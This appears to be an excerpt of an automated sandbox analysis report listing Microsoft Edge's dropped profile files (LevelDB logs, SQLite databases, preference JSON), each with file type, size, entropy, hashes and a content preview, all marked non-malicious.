                                                                                                                                                      SHA-256:309A6922FD975AA5AC573254C8ACAE0B036EA4130FE830C70A1649F02432051A
                                                                                                                                                      SHA-512:9AC4785E7398949CAD72B33850529F15D3FD2D2622A83BF8F14FCEC5E97B81F35E1C0AE7202AD97AEAB22480114B2B3BDA0FF20FA4AFB80240C2830A9B5D2ABA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.669 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/04-07:58:11.670 1f30 Recovering log #3.2024/12/04-07:58:11.670 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):326
                                                                                                                                                      Entropy (8bit):5.246007075196928
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjznQyq2Pwkn23oH+TcwtpIFUt8mjzjVG1Zmw+mjzjVQRkwOwkn23oH+Tcwta/Wd:jVvYfYebmFUt8AVG1/+AVI5JfYebaUJ
                                                                                                                                                      MD5:444EDBADD27ED1F48CD5B798E390F9CF
                                                                                                                                                      SHA1:E8087D1D8CC22F5D24AD9B1FDAD4F185B9B80534
                                                                                                                                                      SHA-256:309A6922FD975AA5AC573254C8ACAE0B036EA4130FE830C70A1649F02432051A
                                                                                                                                                      SHA-512:9AC4785E7398949CAD72B33850529F15D3FD2D2622A83BF8F14FCEC5E97B81F35E1C0AE7202AD97AEAB22480114B2B3BDA0FF20FA4AFB80240C2830A9B5D2ABA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:11.669 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/04-07:58:11.670 1f30 Recovering log #3.2024/12/04-07:58:11.670 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):28672
                                                                                                                                                      Entropy (8bit):0.26707851465859517
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                      MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                      SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                      SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                      SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):131072
                                                                                                                                                      Entropy (8bit):0.0033769341339387224
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ImtVui//l/CPt/:IiVui//cl/
                                                                                                                                                      MD5:606AAA3702A86898246468451E4E30A5
                                                                                                                                                      SHA1:1C04A549000882800A80B920BF210619808A3FFE
                                                                                                                                                      SHA-256:66AF63E590216CDF1A10CB02EDD38C2D7264BB23120DA92B084139566C9C922B
                                                                                                                                                      SHA-512:A5A00DE1B9316FA9CDBF35D9E781130FBAA534B4896245BC13F8DA454681319A063D9CFD3EE447542AC940AE8DE1BA9A32324ED14BE3189AAA3870C256E9C8DF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:VLnk.....?.........u.6Q.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):184320
                                                                                                                                                      Entropy (8bit):1.0669283877689495
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:QSqzWMMUfTcnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYWJn6:QrzWMffInzkkqtXnTK+hNH+5EVum3
                                                                                                                                                      MD5:271FB8837913D805C05706F7EE18532C
                                                                                                                                                      SHA1:AC67A1B9D727158C2D4D0F6DD7AC85EB2C7844AB
                                                                                                                                                      SHA-256:7CF57C2114E2B6EB625861B04678D6E65848A494B419D5156D4AC7D6BFE5F6BD
                                                                                                                                                      SHA-512:9E4A7D7BD31634DBB55A37AA8237F8157243EDA85893311AF61462F722D1C3E478F7E81A397B474BE8129CD69376949A6E628FC2A94BD53279C5244D1B2BE8DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):14336
                                                                                                                                                      Entropy (8bit):0.7836182415564406
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                      MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                      SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                      SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                      SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40960
                                                                                                                                                      Entropy (8bit):0.41235120905181716
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                      MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                      SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                      SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                      SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11755
                                                                                                                                                      Entropy (8bit):5.190465908239046
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                      MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                      SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                      SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                      SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):28672
                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13478
                                                                                                                                                      Entropy (8bit):5.230723347429735
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:sVEJ9pQTryZilba4uy8J+jXXsdY8378tpj+FVAxOnh291f:sVELAfuvJ+jHHpUVCOhY
                                                                                                                                                      MD5:DB22DE886AD67411805F85CECEF0828B
                                                                                                                                                      SHA1:094BAC8ADD67FB9EA73B22E1593794A879A87527
                                                                                                                                                      SHA-256:E39A9345534BBF2C0F7B721688B32A1CC268D12CA721BD3647221439A22CF5AA
                                                                                                                                                      SHA-512:697AE8479AA085DCD20A740850E09013B144BE4D73B3FB80B910942958A0DEFE429D40A477335A58D90DB82A811A04D5FCA4D600E30C606AFF0EB39DE6C1BBC9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25012
                                                                                                                                                      Entropy (8bit):5.567948718158369
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:hVsT75LWPd5f5I8F1+UoAYDCx9Tuqh0VfUC9xbog/OViHBSYrw9pituYdd:hVsT75LWPd5f5Iu1ja3hSJGtDd
                                                                                                                                                      MD5:1A843A9A071C3F77F2FE45EF8F8B7B15
                                                                                                                                                      SHA1:07CB178C466DEE5723514DF8EB2D678147E7B477
                                                                                                                                                      SHA-256:0987AA8120B5F343BD7F0DE3926F6DEA6920928256918E5BAB5C0D96677C4440
                                                                                                                                                      SHA-512:23356253834775779511CAD519FD46CC8A86C15ED3C123F03A95C7FDD5E95BE0D54C2EA41F9A4BA3B89386C1E632D5678359C78A203A84FDEDDC39C38E4C9AE6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16384
                                                                                                                                                      Entropy (8bit):0.35226517389931394
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                      MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                      SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                      SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                      SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):221
                                                                                                                                                      Entropy (8bit):4.593104907922797
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:VVXntjQPEnjQSf3r6P/FDdllCl/Us6tKC5jlfseGKT9rcQ6x7AUL1FUL1:/XntM+R3illW1O/sedhO75E
                                                                                                                                                      MD5:8AA718FC4E285415F8817E03EBEFBDA9
                                                                                                                                                      SHA1:6ED0035F76D4BE68A9F3E027F0A410F4D7A8B5C3
                                                                                                                                                      SHA-256:6BBC6D9CD9808AC43146E6A235A42811F499F4C4CEFF60879B3730D2AF154085
                                                                                                                                                      SHA-512:1779A2EBC4BB9B7185A236E807F7A59777EA47918A0263FD70B354E4432635D9195CDA669BACD82F9270770505B96BBBCC9F6DFABF601779445645DC5B356347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:A..r.................20_1_1...1.,U.................20_1_1...1..T.;...............#38_h.......6.Z..W.F.....`.......`................0................39_config..........6.....n ...1V.e................V.e................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):281
                                                                                                                                                      Entropy (8bit):5.204134892824698
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeXe1wkn23oH+Tcwtfrl2KLlJjeXhUv4q2Pwkn23oH+TcwtfrK+IFUv:2XpfYeb1LuXaAvYfYeb23FUv
                                                                                                                                                      MD5:52FE0B9CD8559F84DB903CB56537A207
                                                                                                                                                      SHA1:EBEEEA66478A65DA45AD8CC4DB967B87DCE5CC97
                                                                                                                                                      SHA-256:AA118E380660BBB13F1ADEA263751492D0F32EB37B9F8857D4F55AF68E610BFD
                                                                                                                                                      SHA-512:138E86CBAD676559FB53A4E52FB6D6DCF84D1E05B988200D7D937CDBFE0F7752DF8114F72A731565F6CE98622C2BE7F09B92BF03F24F68E87E606858F5B4BA93
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.282 1f00 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2024/12/04-07:58:12.295 1f00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):617
                                                                                                                                                      Entropy (8bit):3.951563863203039
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:G0nYUteza//z3rt/Rz0RuWlJhC+l9IkyvRtin01zv0:G0nYUtezaD3pFovhC+l9ZmL0
                                                                                                                                                      MD5:16F0A68E9E4A25FEC106C0027A925514
                                                                                                                                                      SHA1:581B935F4B83E992DFF2F71F74309F9C8D07BB51
                                                                                                                                                      SHA-256:97AAB7AD7D42EE748F1DA9EC25C00A0744861670C204EC40637BD879A63638FA
                                                                                                                                                      SHA-512:98C2809017AAAAB6F0BDD039BD7CA44F5CA7F303EFE18DA96A372CC892CC0427AC19BFA78D785E38B3FD886353FFADECDF907F8072CFF8133DB56E39AC13F3F0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....n[.=.................33_.....vuNX.................21_.....<...................20_.....*...................18_.....W.J+.................19_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....f.F..................18_.....B.I..................19_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16
                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):299
                                                                                                                                                      Entropy (8bit):5.171213901439722
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjeXTVb1wkn23oH+Tcwtfrzs52KLlJjeX7/N4q2Pwkn23oH+TcwtfrzAdIFUv:2XT8fYebs9LuX7/OvYfYeb9FUv
                                                                                                                                                      MD5:D5DD5BCFC39841DDE35023A53B7BFBEB
                                                                                                                                                      SHA1:826F7CC95A16C9A71B590A333995BA07527A3075
                                                                                                                                                      SHA-256:2D4F148FC6B14A8DD8912369524F737F2AC992BA009CAE3552813D9704E19E18
                                                                                                                                                      SHA-512:1926DCEB02B9AEB26E2125C3C53C4133B24E1280E17E8F950E3C13930E44DF4D83D695A60C634E3B6182EA546018B45CA904D65AB59470B15D02BCAED63E30B8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.234 1f00 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2024/12/04-07:58:12.278 1f00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):41
                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
